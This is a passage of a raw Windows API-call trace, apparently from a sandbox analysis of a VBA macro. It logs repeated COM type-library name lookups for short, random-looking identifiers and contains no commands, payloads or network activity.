ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.618] IMalloc:Alloc (This=0x7fefec05380, cb=0x10) returned 0x67c2d40 [0069.618] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x9, _Src=0x3b81362 | out: _Dst=0x67c2d40) returned 0x0 [0069.618] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_MAAQBC4D") returned 0x1041c4 [0069.618] strcpy_s (in: _Dst=0x144e50, _DstSize=0x10, _Src="_B_var_MAAQBC4D" | out: _Dst="_B_var_MAAQBC4D") returned 0x0 [0069.618] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=16, lpWideCharStr=0x144ca0, cchWideChar=16 | out: lpWideCharStr="_B_var_MAAQBC4D") returned 16 [0069.618] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.618] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_MAAQBC4D", lHashVal=0x1041c4, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.618] IUnknown:Release (This=0x665ba50) returned 0xd [0069.618] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.618] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_MAAQBC4D", lHashVal=0x1041c4, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.618] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.618] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.618] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_MAAQBC4D", lHashVal=0x1041c4, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.618] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.619] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.619] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_MAAQBC4D", lHashVal=0x1041c4, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.619] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.619] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.619] IUnknown:Release (This=0x665ba50) returned 0xd [0069.619] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xa87052e, cbMultiByte=16, lpWideCharStr=0x144d00, cchWideChar=17 | out: lpWideCharStr="_B_var_MAAQBC4D") returned 16 [0069.619] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_MAAQBC4D", lHashVal=0x1041c4, wFlags=0x3, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x4d005f00720061, ppTypeComp=0x42005100000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x4d005f00720061, ppTypeComp=0x42005100000000, pDummy=0x0) returned 0x0 [0069.619] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x9, _Src=0x3b81362 | out: _Dst=0x144ec0) returned 0x0 [0069.619] ITypeComp:RemoteBind (in: This=0x665ba60, szName="kABAAoQ", lHashVal=0x10955c, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.619] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b8133a, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="kABAAoQ") returned 8 [0069.619] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="kABAAoQ", lHashVal=0x10955c, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.619] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b8133a, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="kABAAoQ") returned 8 [0069.619] ITypeComp:RemoteBind (in: This=0x665bd30, szName="kABAAoQ", lHashVal=0x10955c, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.619] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="kABAAoQ") returned 0x10955c [0069.619] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x8, _Src="kABAAoQ" | out: _Dst="kABAAoQ") returned 0x0 [0069.619] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=8, lpWideCharStr=0x144af0, cchWideChar=8 | out: lpWideCharStr="kABAAoQ") returned 8 [0069.619] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.619] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="kABAAoQ", lHashVal=0x10955c, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.619] IUnknown:Release (This=0x665ba50) returned 0xd [0069.619] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.619] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="kABAAoQ", lHashVal=0x10955c, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.619] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.619] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.619] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="kABAAoQ", lHashVal=0x10955c, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.620] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.620] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.620] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="kABAAoQ", lHashVal=0x10955c, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.620] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.620] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b8133a, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="kABAAoQ") returned 8 [0069.620] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="kABAAoQ", lHashVal=0x10955c, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.620] IMalloc:Alloc (This=0x7fefec05380, cb=0xf) returned 0x67c2d40 [0069.620] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x8, _Src=0x3b8133a | out: _Dst=0x67c2d40) returned 0x0 [0069.620] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_kABAAoQ") returned 0x10895f [0069.620] strcpy_s (in: _Dst=0x144e50, _DstSize=0xf, _Src="_B_var_kABAAoQ" | out: _Dst="_B_var_kABAAoQ") returned 0x0 [0069.620] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=15, lpWideCharStr=0x144ca0, cchWideChar=15 | out: lpWideCharStr="_B_var_kABAAoQ") returned 15 [0069.620] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.620] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_kABAAoQ", lHashVal=0x10895f, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.620] IUnknown:Release (This=0x665ba50) returned 0xd [0069.620] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.620] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_kABAAoQ", lHashVal=0x10895f, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.620] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.620] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.620] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_kABAAoQ", lHashVal=0x10895f, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.620] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.620] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.620] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_kABAAoQ", lHashVal=0x10895f, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.620] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.620] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.620] IUnknown:Release (This=0x665ba50) returned 0xd [0069.620] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xa87055e, cbMultiByte=15, lpWideCharStr=0x144d00, cchWideChar=16 | out: lpWideCharStr="_B_var_kABAAoQ") returned 15 [0069.620] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_kABAAoQ", lHashVal=0x10895f, wFlags=0x5, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x6b005f00720061, ppTypeComp=0x41004100000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x6b005f00720061, ppTypeComp=0x41004100000000, pDummy=0x0) returned 0x0 [0069.620] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x8, _Src=0x3b8133a | out: _Dst=0x144ec0) returned 0x0 [0069.621] ITypeComp:RemoteBind (in: This=0x665ba60, szName="X_XDBk", lHashVal=0x104c4b, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.621] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b8138e, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="X_XDBk") returned 7 [0069.621] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="X_XDBk", lHashVal=0x104c4b, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.621] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b8138e, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="X_XDBk") returned 7 [0069.621] ITypeComp:RemoteBind (in: This=0x665bd30, szName="X_XDBk", lHashVal=0x104c4b, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.621] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="X_XDBk") returned 0x104c4b [0069.621] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x7, _Src="X_XDBk" | out: _Dst="X_XDBk") returned 0x0 [0069.621] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=7, lpWideCharStr=0x144af0, cchWideChar=7 | out: lpWideCharStr="X_XDBk") returned 7 [0069.621] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.621] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="X_XDBk", lHashVal=0x104c4b, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.621] IUnknown:Release (This=0x665ba50) returned 0xd [0069.621] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.621] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="X_XDBk", lHashVal=0x104c4b, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.621] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.621] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.621] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="X_XDBk", lHashVal=0x104c4b, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.621] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.621] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.621] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="X_XDBk", lHashVal=0x104c4b, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.621] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.621] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b8138e, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="X_XDBk") returned 7 [0069.621] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="X_XDBk", lHashVal=0x104c4b, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.621] IMalloc:Alloc (This=0x7fefec05380, cb=0xe) returned 0x67c2d40 [0069.622] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x7, _Src=0x3b8138e | out: _Dst=0x67c2d40) returned 0x0 [0069.622] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_X_XDBk") returned 0x10c6f4 [0069.622] strcpy_s (in: _Dst=0x144e50, _DstSize=0xe, _Src="_B_var_X_XDBk" | out: _Dst="_B_var_X_XDBk") returned 0x0 [0069.622] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=14, lpWideCharStr=0x144ca0, cchWideChar=14 | out: lpWideCharStr="_B_var_X_XDBk") returned 14 [0069.622] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.622] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_X_XDBk", lHashVal=0x10c6f4, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.622] IUnknown:Release (This=0x665ba50) returned 0xd [0069.622] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.622] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_X_XDBk", lHashVal=0x10c6f4, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.622] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.622] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.622] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_X_XDBk", lHashVal=0x10c6f4, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.622] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.622] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.622] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_X_XDBk", lHashVal=0x10c6f4, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.622] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.622] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.622] IUnknown:Release (This=0x665ba50) returned 0xd [0069.622] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xa87058e, cbMultiByte=14, lpWideCharStr=0x144d00, cchWideChar=15 | out: lpWideCharStr="_B_var_X_XDBk") returned 14 [0069.622] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_X_XDBk", lHashVal=0x10c6f4, wFlags=0x3, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x58005f00720061, ppTypeComp=0x42004400000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x58005f00720061, ppTypeComp=0x42004400000000, pDummy=0x0) returned 0x0 [0069.622] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x7, _Src=0x3b8138e | out: _Dst=0x144ec0) returned 0x0 [0069.622] ITypeComp:RemoteBind (in: This=0x665ba60, szName="fX_ADcZU", lHashVal=0x10142a, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.622] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b813b6, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="fX_ADcZU") returned 9 [0069.622] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="fX_ADcZU", lHashVal=0x10142a, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.623] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b813b6, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="fX_ADcZU") returned 9 [0069.623] ITypeComp:RemoteBind (in: This=0x665bd30, szName="fX_ADcZU", lHashVal=0x10142a, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.623] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="fX_ADcZU") returned 0x10142a [0069.623] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x9, _Src="fX_ADcZU" | out: _Dst="fX_ADcZU") returned 0x0 [0069.623] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=9, lpWideCharStr=0x144af0, cchWideChar=9 | out: lpWideCharStr="fX_ADcZU") returned 9 [0069.623] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.623] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="fX_ADcZU", lHashVal=0x10142a, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.623] IUnknown:Release (This=0x665ba50) returned 0xd [0069.623] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.623] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="fX_ADcZU", lHashVal=0x10142a, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.623] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.623] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.623] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="fX_ADcZU", lHashVal=0x10142a, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.623] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.623] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.623] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="fX_ADcZU", lHashVal=0x10142a, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.623] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.623] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b813b6, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="fX_ADcZU") returned 9 [0069.623] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="fX_ADcZU", lHashVal=0x10142a, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.623] IMalloc:Alloc (This=0x7fefec05380, cb=0x10) returned 0x67c2d40 [0069.623] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x9, _Src=0x3b813b6 | out: _Dst=0x67c2d40) returned 0x0 [0069.623] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_fX_ADcZU") returned 0x10ebf2 [0069.623] strcpy_s (in: _Dst=0x144e50, _DstSize=0x10, _Src="_B_var_fX_ADcZU" | out: _Dst="_B_var_fX_ADcZU") returned 0x0 [0069.623] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=16, lpWideCharStr=0x144ca0, cchWideChar=16 | out: lpWideCharStr="_B_var_fX_ADcZU") returned 16 [0069.623] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.623] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_fX_ADcZU", lHashVal=0x10ebf2, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.623] IUnknown:Release (This=0x665ba50) returned 0xd [0069.624] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.624] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_fX_ADcZU", lHashVal=0x10ebf2, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.624] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.624] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.624] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_fX_ADcZU", lHashVal=0x10ebf2, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.624] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.624] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.624] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_fX_ADcZU", lHashVal=0x10ebf2, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.624] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.624] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.624] IUnknown:Release (This=0x665ba50) returned 0xd [0069.624] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xa8705be, cbMultiByte=16, lpWideCharStr=0x144d00, cchWideChar=17 | out: lpWideCharStr="_B_var_fX_ADcZU") returned 16 [0069.624] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_fX_ADcZU", lHashVal=0x10ebf2, wFlags=0x3, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x66005f00720061, ppTypeComp=0x44004100000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x66005f00720061, ppTypeComp=0x44004100000000, pDummy=0x0) returned 0x0 [0069.624] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x9, _Src=0x3b813b6 | out: _Dst=0x144ec0) returned 0x0 [0069.624] ITypeComp:RemoteBind (in: This=0x665ba60, szName="NBADAxA", lHashVal=0x1023cd, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.624] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b8140a, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="NBADAxA") returned 8 [0069.624] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="NBADAxA", lHashVal=0x1023cd, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.624] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b8140a, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="NBADAxA") returned 8 [0069.624] ITypeComp:RemoteBind (in: This=0x665bd30, szName="NBADAxA", lHashVal=0x1023cd, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.624] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="NBADAxA") returned 0x1023cd [0069.624] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x8, _Src="NBADAxA" | out: _Dst="NBADAxA") returned 0x0 [0069.624] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=8, lpWideCharStr=0x144af0, cchWideChar=8 | out: lpWideCharStr="NBADAxA") returned 8 [0069.624] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.624] ITypeLib:RemoteIsName (in: This=0x665ba50, 